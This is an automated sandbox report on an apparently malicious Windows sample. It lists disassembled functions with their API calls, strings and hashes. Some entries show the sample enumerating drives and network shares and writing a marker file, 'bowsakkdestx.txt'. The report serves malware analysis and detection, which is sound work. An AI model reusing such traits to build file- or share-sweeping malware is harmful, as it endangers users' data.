Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _write_multi_char$_write_string$__cftof_free
String ID:
API String ID: 2964551433-0
Opcode ID: 24375c1184f10fff9f69e53d20d398cf7003ebcd556f5164746207377439a35e
Instruction ID: 6e53a8d943180cd312645f9ab6be848b87d00e26e6c43e5a6b33f09903c19296
Opcode Fuzzy Hash: 24375c1184f10fff9f69e53d20d398cf7003ebcd556f5164746207377439a35e
Instruction Fuzzy Hash: AA515771F09139AFDF309A54DC99BAAB7B5EF04304F4400DAD908A6251D7799F80CF59

Function 004273FA Relevance: 10.6, APIs: 7, Instructions: 127COMMON

Download Yara Rule

APIs

_write_multi_char.LIBCMT ref: 00427477
_write_string.LIBCMT ref: 004274A0
_write_multi_char.LIBCMT ref: 004274C2
__cftof.LIBCMT ref: 00427500
_write_string.LIBCMT ref: 00427531
_write_multi_char.LIBCMT ref: 00427592
_free.LIBCMT ref: 004275AB

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _write_multi_char$_write_string$__cftof_free
String ID:
API String ID: 2964551433-0
Opcode ID: 9184f045ad01bb42410d4e7ab6faa150617f92114e0b0a62860346184688369c
Instruction ID: 8198ec34aa8999dc590647716f2dc488f85491d7af5cc04cf74bf98b0f8c793f
Opcode Fuzzy Hash: 9184f045ad01bb42410d4e7ab6faa150617f92114e0b0a62860346184688369c
Instruction Fuzzy Hash: F2514471F05139AEDF309A68DC99BAAB7B5EF04304F4400DAE908A6251E7399F80CF59

Function 00411B10 Relevance: 10.6, APIs: 7, Instructions: 50timewindowsleepCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00411B1E
timeGetTime.WINMM ref: 00411B29
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B4C
DispatchMessageW.USER32(?), ref: 00411B5C
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B6A
Sleep.KERNEL32(00000064), ref: 00411B72
timeGetTime.WINMM ref: 00411B78

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: MessageTimetime$Peek$DispatchSleep
String ID:
API String ID: 3697694649-0
Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9

Function 00425141 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00425141

Part of subcall function 00427D6C: EncodePointer.KERNEL32(00000000,?,00425146,00423FFE,00507990,00000014), ref: 00427D6F
Part of subcall function 00427D6C: __initp_misc_winsig.LIBCMT ref: 00427D8A
Part of subcall function 00427D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004326B3
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004326C7
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004326DA
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004326ED
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00432700
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00432713
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00432726
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00432739
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0043274C
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0043275F
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00432772
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00432785
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00432798
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004327AB
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004327BE
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004327D1

__mtinitlocks.LIBCMT ref: 00425146
__mtterm.LIBCMT ref: 0042514F

Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B62
Part of subcall function 004251B7: _free.LIBCMT ref: 00428B69
Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(0050AC00,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B8B

__calloc_crt.LIBCMT ref: 00425174
__initptd.LIBCMT ref: 00425196
GetCurrentThreadId.KERNEL32 ref: 0042519D

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
Instruction ID: 366d1241f395ce705af539ece55ec53f654f371a685379b5f067519d47a60e56
Opcode Fuzzy Hash: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
Instruction Fuzzy Hash: 75F0CD32B4AB712DE2343AB67D03B6B2680AF00738BA1061FF064C42D1EF388401455C

Function 004253AE Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 0042594A

Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22

_free.LIBCMT ref: 00425970

Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13

__lock.LIBCMT ref: 00425989
___removelocaleref.LIBCMT ref: 00425998
___freetlocinfo.LIBCMT ref: 004259B1
_free.LIBCMT ref: 004259C4

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
String ID:
API String ID: 626533743-0
Opcode ID: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
Instruction ID: 81c7b0a8007453265eca5a285afc690957d7e654b57493ebbede42104a270bc8
Opcode Fuzzy Hash: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
Instruction Fuzzy Hash: E801A1B1702B20E6DB34AB69F446B1E76A0AF10739FE0424FE0645A1D5CFBD99C0CA5D

Function 004506A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMONLIBRARYCODE

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 004507C3

Strings

reason(%lu), xrefs: 00450758
lib(%lu), xrefs: 0045071C
func(%lu), xrefs: 00450734
error:%08lX:%s:%s:%s, xrefs: 00450792

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: ___from_strstr_to_strchr
String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
API String ID: 601868998-2416195885
Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96

Function 0045AE30 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045AE4B
_memset.LIBCMT ref: 0045AE6C

Strings

.\crypto\buffer\buffer.c, xrefs: 0045AE88, 0045AEBE, 0045AED3, 0045AEF0
g9F, xrefs: 0045AE31, 0045AE36, 0045AE63, 0045AF14, 0045AF1D

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _memset
String ID: .\crypto\buffer\buffer.c$g9F
API String ID: 2102423945-3653307630
Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9

Function 004C5D39 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 004C5D3D

Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083

__calloc_crt.LIBCMT ref: 004C5D60
__get_sys_err_msg.LIBCMT ref: 004C5D7E
__get_sys_err_msg.LIBCMT ref: 004C5DCD

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 3123740607-798102604
Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD

Function 00462FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

_fprintf.LIBCMT ref: 0046307E
_memset.LIBCMT ref: 004630AB

Strings

Enter PEM pass phrase:, xrefs: 00463036, 00463043, 00463084
.\crypto\pem\pem_lib.c, xrefs: 00463097
phrase is too short, needs to be at least %d chars, xrefs: 00463070

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _fprintf_memset
String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
API String ID: 3021507156-3399676524
Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA

Function 0040C500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539

Strings

bowsakkdestx.txt, xrefs: 0040C52D

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Path$AppendFolder
String ID: bowsakkdestx.txt
API String ID: 29327785-2616962270
Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9

Function 0041BA80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
ShowWindow.USER32(00000000,00000000), ref: 0041BABE
UpdateWindow.USER32(00000000), ref: 0041BAC5

Strings

LPCWSTRszWindowClass, xrefs: 0041BAA0
LPCWSTRszTitle, xrefs: 0041BA9B

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Window$CreateShowUpdate
String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
API String ID: 2944774295-3503800400
Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C

Function 00410BD0 Relevance: 7.7, APIs: 5, Instructions: 234sharememoryCOMMON

Download Yara Rule

APIs

WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
_memset.LIBCMT ref: 00410C4C
WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Enum$AllocGlobalOpenResource_memset
String ID:
API String ID: 364255426-0
Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A

Function 004416EB Relevance: 7.6, APIs: 5, Instructions: 112COMMON

Download Yara Rule

APIs

__getenv_helper_nolock.LIBCMT ref: 00441726
_strlen.LIBCMT ref: 00441734

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

_strnlen.LIBCMT ref: 004417BF
__lock.LIBCMT ref: 004417D0
__getenv_helper_nolock.LIBCMT ref: 004417DB

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
String ID:
API String ID: 2168648987-0
Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD

Function 00410A50 Relevance: 7.6, APIs: 5, Instructions: 104COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 00410A75
SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
PathFileExistsA.SHLWAPI(?), ref: 00410AF9
SetErrorMode.KERNEL32(00000000), ref: 00410B02
GetDriveTypeA.KERNEL32(?), ref: 00410B1B

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
String ID:
API String ID: 2560635915-0
Opcode ID: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
Opcode Fuzzy Hash: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97

Function 0043B6FF Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0043B70B

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00550000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_free.LIBCMT ref: 0043B71E

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
Opcode Fuzzy Hash: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC

Function 0041F070 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041F085
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0AC
DispatchMessageW.USER32(?), ref: 0041F0B6
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0C4
WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98

Function 0041E500 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041E515
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E53C
DispatchMessageW.USER32(?), ref: 0041E546
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E554
WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98

Function 0041FA40 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FA53
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA71
DispatchMessageW.USER32(?), ref: 0041FA7B
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA89
WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4

Function 0041FDF0 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FE03
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE21
DispatchMessageW.USER32(?), ref: 0041FE2B
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE39
WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
